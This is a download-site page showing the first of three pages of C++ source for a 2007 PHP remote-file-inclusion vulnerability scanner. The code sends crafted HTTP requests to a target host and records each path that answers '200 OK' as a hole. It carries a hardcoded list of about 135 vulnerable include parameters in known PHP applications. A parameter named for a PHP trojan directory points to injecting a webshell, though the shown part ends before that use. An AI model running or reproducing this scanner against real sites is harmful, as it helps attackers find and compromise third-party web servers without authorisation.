⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站
📤 上传资源

📄 phpinclude.cpp

📁 php include 漏洞扫描器源代码
💻 CPP
📖 第 1 页 / 共 3 页
字号:
🔍
123 
/*
 php include vulu scanner,code by horse_b
 2007-06-05

*/

#include "stdafx.h"
#include "getopt.h"
#include "windns.h"  
#include <winsock.h>


struct cgiurl{
	char *rmt_host;
	char *rmt_wwwhost;
	char *url;
	int n;
	int rmt_port;
	int vebose;
};

int countvulscan = 0;
int findok = 0;


void SaveLog(char* c)
{
	CTime tm=CTime::GetCurrentTime();
	CString name = "log.s";
	CFile file;
	if(!file.Open(name,CFile::modeReadWrite))
	{
		file.Open(name,CFile::modeCreate|CFile::modeReadWrite);
	}
	file.SeekToEnd();
	
	UINT nLen = strlen(c);
	file.Write(c,nLen);
	file.Write("\r\n",2);
	file.Close();
}

UINT GetPhpInc(LPVOID pParam)
{
	char holetmp[4096] = "\0";
	char rbuff[1024];
	struct cgiurl* tcgi=(struct cgiurl *)pParam;
	char *hole=tcgi->url;
	int port = tcgi->rmt_port;
	int vebose = tcgi->vebose;
		
	countvulscan++;

	struct timeval	tv;
	tv.tv_sec  = 10;
	tv.tv_usec = 0;
	
	//"GET %s HTTP/1.0\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* \r\nAccept-Language: zh-cn\r\nAccept-Encoding: gzip, deflate\r\nIf-Modified-Since: Sun, 26 Jun 2005 15:43:05 GMT\r\nIf-None-Match: \"60794-12b3-e4169440\"\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 1.0.3705)\r\nHost: %s\r\n\r\n",argv[2],argv[1]
	char *rmt_host=tcgi->rmt_host;
	char *rmt_wwwhost=tcgi->rmt_wwwhost;
	
	CString url="GET ";
	url+=hole;
	url+="\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* \r\n";
	url+="Referer: ";
	url+=rmt_wwwhost;
	url+="\r\n";
	url+="Accept-Language: zh-cn\r\nAccept-Encoding: gzip, deflate\r\nIf-Modified-Since: Sun, 26 Jun 2005 15:43:05 GMT\r\nIf-None-Match: \"60794-12b3-e4169440\"\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 1.0.3705)\r\n";
	url+="Host: ";
	url+=rmt_host;
	url+="\r\n\r\n";
	
	int num=tcgi->n;
	
	SOCKET sockfd;
	SOCKADDR_IN addr;
	sockfd = socket(AF_INET, SOCK_STREAM, 0);
	if (sockfd < 0) 
	{
		exit(0);
	}
	addr.sin_family = AF_INET;
	addr.sin_port = htons(port);
	addr.sin_addr.s_addr = inet_addr(rmt_host);
	int r = connect(sockfd,(struct sockaddr *) &addr, sizeof(addr));
	send(sockfd,url,url.GetLength(),0);
	memset(rbuff,0,1024);

	int e;
	fd_set rd;
	int n = 0;
	
	
	FD_ZERO(&rd);
	FD_SET(sockfd, &rd);
	
	for(;;)
	{
		tv.tv_sec = 10;
		tv.tv_usec = 0;
		e = select(sockfd + 1, &rd, NULL, NULL, &tv);
		if(e < 0 )continue;
		else break;
	}
	
	if(e > 0 && FD_ISSET(sockfd, &rd) != 0)
	{
		n = recv(sockfd,rbuff,sizeof(rbuff),0);
		if(n <= 0)
			return 0;
		
	}
	
	//printf("---------------------->recv size(buff) = %d\n",n);

	CString display="\tfind";
	display+=hole;
	display+="------->>>>>> hole ok\r\n";
	if (strstr(rbuff,"200 OK")!=NULL)
	{
		sprintf(holetmp,"%s\n",display);
		SaveLog(holetmp);
		printf(holetmp);
		findok++;
	}
	closesocket(sockfd);
	return 0;
}


int StartScan(char *rmt_host,char *rmt_wwwhost,int rmt_host_port,char* myphptrojandir,int vebose)
{
	char rbuff[1024];
	char holetmp[4096] = "\0";
	char* phpurl[430];
	
	
	phpurl[0]="cgi-bin/gadgets/Blog/BlogModel.php?path="; 
	phpurl[1]="includes/header.php?systempath="; 
	phpurl[2]="Gallery/displayCategory.php?basepath="; 
	phpurl[3]="index.inc.php?PATH_Includes="; 
	phpurl[4]="nphp/nphpd.php?nphp_config[LangFile]="; 
	phpurl[5]="include/db.php?GLOBALS[rootdp]="; 
	phpurl[6]="ashnews.php?pathtoashnews="; 
	phpurl[7]="ashheadlines.php?pathtoashnews="; 
	phpurl[8]="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR="; 
	phpurl[9]="demo/includes/init.php?user_inc="; 
	phpurl[10]="jaf/index.php?show="; 
	phpurl[11]="inc/shows.inc.php?cutepath="; 
	phpurl[12]="poll/admin/common.inc.php?base_path="; 
	phpurl[13]="pollvote/pollvote.php?pollname="; 
	phpurl[14]="sources/post.php?fil_config="; 
	phpurl[15]="modules/My_eGallery/public/displayCategory.php?basepath="; 
	phpurl[16]="bb_lib/checkdb.inc.php?libpach="; 
	phpurl[17]="include/livre_include.php?no_connect=lol&chem_absolu="; 
	phpurl[18]="index.php?from_market=Y&pageurl="; 
	phpurl[19]="modules/mod_mainmenu.php?mosConfig_absolute_path="; 
	phpurl[20]="pivot/modules/module_db.php?pivot_path="; 
	phpurl[21]="modules/4nAlbum/public/displayCategory.php?basepath="; 
	phpurl[22]="derniers_commentaires.php?rep="; 
	phpurl[23]="modules/coppermine/themes/default/theme.php?THEME_DIR="; 
	phpurl[24]="modules/coppermine/include/init.inc.php?CPG_M_DIR="; 
	phpurl[25]="modules/coppermine/themes/coppercop/theme.php?THEME_DIR="; 
	phpurl[26]="coppermine/themes/maze/theme.php?THEME_DIR="; 
	phpurl[28]="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]="; 
	phpurl[29]="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]="; 
	phpurl[30]="myPHPCalendar/admin.php?cal_dir="; 
	phpurl[31]="agendax/addevent.inc.php?agendax_path="; 
	phpurl[32]="modules/mod_mainmenu.php?mosConfig_absolute_path="; 
	phpurl[33]="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path="; 
	phpurl[34]="main.php?page="; 
	phpurl[35]="default.php?page="; 
	phpurl[36]="index.php?action="; 
	phpurl[37]="index1.php?p="; 
	phpurl[38]="index2.php?x="; 
	phpurl[39]="index2.php?content="; 
	phpurl[40]="index.php?conteudo="; 
	phpurl[41]="index.php?cat="; 
	phpurl[42]="include/new-visitor.inc.php?lvc_include_dir="; 
	phpurl[43]="modules/agendax/addevent.inc.php?agendax_path="; 
	phpurl[44]="shoutbox/expanded.php?conf="; 
	phpurl[45]="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR="; 
	phpurl[46]="pivot/modules/module_db.php?pivot_path="; 
	phpurl[47]="library/editor/editor.php?root="; 
	phpurl[48]="library/lib.php?root="; 
	phpurl[49]="e107/e107_handlers/secure_img_render.php?p="; 
	phpurl[50]="zentrack/index.php?configFile="; 
	phpurl[51]="main.php?x="; 
	phpurl[52]="becommunity/community/index.php?pageurl="; 
	phpurl[53]="GradeMap/index.php?page="; 
	phpurl[54]="phpopenchat/contrib/yabbse/poc.php?sourcedir="; 
	phpurl[55]="calendar/calendar.php?serverPath="; 
	phpurl[56]="calendar/functions/popup.php?serverPath="; 
	phpurl[57]="calendar/events/header.inc.php?serverPath="; 
	phpurl[58]="calendar/events/datePicker.php?serverPath="; 
	phpurl[59]="calendar/setup/setupSQL.php?serverPath="; 
	phpurl[60]="calendar/setup/header.inc.php?serverPath="; 
	phpurl[61]="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]="; 
	phpurl[62]="zentrack/index.php?configFile="; 
	phpurl[63]="pivot/modules/module_db.php?pivot_path="; 
	phpurl[64]="inc/header.php/step_one.php?server_inc="; 
	phpurl[65]="install/index.php?lng=../../include/main.inc&G_PATH="; 
	phpurl[66]="inc/pipe.php?HCL_path="; 
	phpurl[67]="include/write.php?dir="; 
	phpurl[68]="include/new-visitor.inc.php?lvc_include_dir="; 
	phpurl[69]="includes/header.php?systempath="; 
	phpurl[70]="support/mailling/maillist/inc/initdb.php?absolute_path="; 
	phpurl[71]="coppercop/theme.php?THEME_DIR="; 
	phpurl[72]="zentrack/index.php?configFile="; 
	phpurl[73]="pivot/modules/module_db.php?pivot_path="; 
	phpurl[74]="inc/header.php/step_one.php?server_inc="; 
	phpurl[75]="install/index.php?lng=../../include/main.inc&G_PATH="; 
	phpurl[76]="inc/pipe.php?HCL_path="; 
	phpurl[77]="include/write.php?dir="; 
	phpurl[78]="include/new-visitor.inc.php?lvc_include_dir="; 
	phpurl[79]="includes/header.php?systempath="; 
	phpurl[80]="support/mailling/maillist/inc/initdb.php?absolute_path="; 
	phpurl[81]="coppercop/theme.php?THEME_DIR="; 
	phpurl[82]="becommunity/community/index.php?pageurl="; 
	phpurl[83]="shoutbox/expanded.php?conf="; 
	phpurl[84]="agendax/addevent.inc.php?agendax_path="; 
	phpurl[85]="myPHPCalendar/admin.php?cal_dir="; 
	phpurl[86]="yabbse/Sources/Packages.php?sourcedir="; 
	phpurl[87]="dotproject/modules/projects/addedit.php?root_dir="; 
	phpurl[88]="dotproject/modules/projects/view.php?root_dir="; 
	phpurl[89]="dotproject/modules/projects/vw_files.php?root_dir="; 
	phpurl[90]="dotproject/modules/tasks/addedit.php?root_dir="; 
	phpurl[91]="dotproject/modules/tasks/viewgantt.php?root_dir="; 
	phpurl[92]="My_eGallery/public/displayCategory.php?basepath="; 
	phpurl[93]="modules/My_eGallery/public/displayCategory.php?basepath="; 
	phpurl[94]="modules/4nAlbum/public/displayCategory.php?basepath="; 
	phpurl[95]="modules/coppermine/themes/default/theme.php?THEME_DIR="; 
	phpurl[96]="modules/agendax/addevent.inc.php?agendax_path="; 
	phpurl[97]="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR="; 
	phpurl[98]="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR="; 
	phpurl[99]="modules/coppermine/include/init.inc.php?CPG_M_DIR="; 
	phpurl[100]="modules/mod_mainmenu.php?mosConfig_absolute_path="; 
	phpurl[101]="shoutbox/expanded.php?conf="; 
	phpurl[102]="pivot/modules/module_db.php?pivot_path="; 
	phpurl[103]="library/editor/editor.php?root="; 
	phpurl[104]="library/lib.php?root="; 
	phpurl[105]="e107/e107_handlers/secure_img_render.php?p="; 
	phpurl[106]="main.php?x="; 
	phpurl[107]="main.php?page="; 
	phpurl[108]="index.php?meio.php="; 
	phpurl[109]="index.php?include="; 
	phpurl[110]="index.php?inc="; 
	phpurl[111]="index.php?page="; 
	phpurl[112]="index.php?pag="; 
	phpurl[113]="index.php?p="; 
	phpurl[114]="index.php?x="; 
	phpurl[115]="index.php?open="; 
	phpurl[116]="index.php?visualizar="; 
	phpurl[117]="index.php?pagina="; 
	phpurl[118]="index2.php?content="; 
	phpurl[119]="inc/step_one_tables.php?server_inc="; 
	phpurl[120]="GradeMap/index.php?page="; 
	phpurl[121]="phpshop/index.php?base_dir="; 
	phpurl[122]="admin.php?cal_dir="; 
	phpurl[123]="contacts.php?cal_dir="; 
	phpurl[124]="convert-date.php?cal_dir="; 
	phpurl[125]="album_portal.php?phpbb_root_path="; 
	phpurl[126]="mainfile.php?MAIN_PATH="; 
	phpurl[127]="dotproject/modules/files/index_table.php?root_dir="; 
	phpurl[128]="html/affich.php?base="; 
	phpurl[129]="gallery/init.php?HTTP_POST_VARS="; 
	phpurl[130]="pm/lib.inc.php?pm_path="; 
	phpurl[131]="ideabox/include.php?gorumDir="; 
	phpurl[132]="index2.php?includes_dir="; 
	phpurl[133]="forums/toplist.php?phpbb_root_path="; 
	phpurl[134]="forum/toplist.php?phpbb_root_path="; 
	phpurl[135]="admin/config_settings.tpl.php?include_path=";
123

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -